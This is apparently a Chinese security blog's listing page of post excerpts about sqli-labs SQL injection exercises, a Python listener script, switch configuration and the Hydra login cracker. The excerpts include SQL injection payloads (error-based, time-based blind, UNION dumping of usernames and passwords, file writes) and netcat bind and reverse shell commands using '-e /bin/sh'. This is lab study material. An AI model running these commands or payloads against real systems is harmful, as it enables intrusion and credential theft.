摘要： 通过黑客python编程写的第一个脚本， 实现监听、连接、代码是写了上传功能、执行文件功能、但是测试是不成功的。 通过这个脚本、了解几个模块 threading，getopt、subprocess、socket 、sys ; 写代码过程中，发现boolean 首字母要大写 正确写法：True、Fal 阅读全文

摘要： 正常发包 没有发现xff 参数 发现登陆成功就可以发现正常有显示 user-agent的信息 user-agent 存在注入点，使用报错注入 。注意user-agent 无法用--+ 进行语句闭合，用# 或者 and 1='1 进行闭合 payload: 'and extractvalue(1,co 阅读全文

摘要： 正向shell nc -lvp 4444 -e /bin/sh nc -lvp 4444 -c:\windows\system32\cmd.exe 反向shell 在本地： nc -lvp 9999 在目标主机 : nc 本地ip 9999 -e /bin/sh //linux 一般情况下，目标主机 阅读全文

摘要： 时间盲注 payload http://192.168.1.30/sqllab/Less-9/?id=1' and if(ascii(substr(payload,1,1))=100,sleep(5),0) --+ if 基本语法 IF(expr1,expr2,expr3)，如果expr1的值为tr 阅读全文

摘要： less 7 是上传文件 前提是要修改mysql 数据库配置文件my.ini 参数secure_file_priv='' payload http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,3 into outf 阅读全文

摘要： 一、实验准备 使用HCL 跟VM、HCL 无法桥接到物理网卡,我使用VM 桥接到virtualbox 的网卡.ENSP跟GNS3 可以直接连接到物理网卡 网关配置在本地virtual 网卡 二、交换机配置： [H3C]info-center enable [H3C]info-center logho 阅读全文

摘要： 通过查看其他博客（https://mochazz.github.io/2017/09/23/Double_%20SQL_Injection/#0x01-%E5%8F%8C%E6%9F%A5%E8%AF%A2）的解释得到自己的理解，主要是因为group by count(*),rand(*)这样的聚合 阅读全文

摘要： less 2 跟less 1区别： 去掉单引号查询表的用户名与密码 http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,':',password) from security.users --+ less 3 跟l 阅读全文

摘要： 1、访问sqllab 的less-1 按提示加入http://10.9.2.81/Less-1/?id=1 2、 后面加入单引号，发生报错http://10.9.2.81/Less-1/?id=1‘ 3、 测试使用查询显示数据行数 http://10.9.2.81/Less-1/?id=1‘ ord 阅读全文

摘要： Hydra介绍 Hydra是一个并行登录破解器，支持多种攻击协议。它非常快速和灵活，新模块易于添加。该工具使研究人员和安全顾问能够展示远程获得对系统未经授权的访问是多么容易。 它支持：Cisco AAA，Cisco auth，Cisco enable，CVS，FTP，HTTP（S）-FORM-GET 阅读全文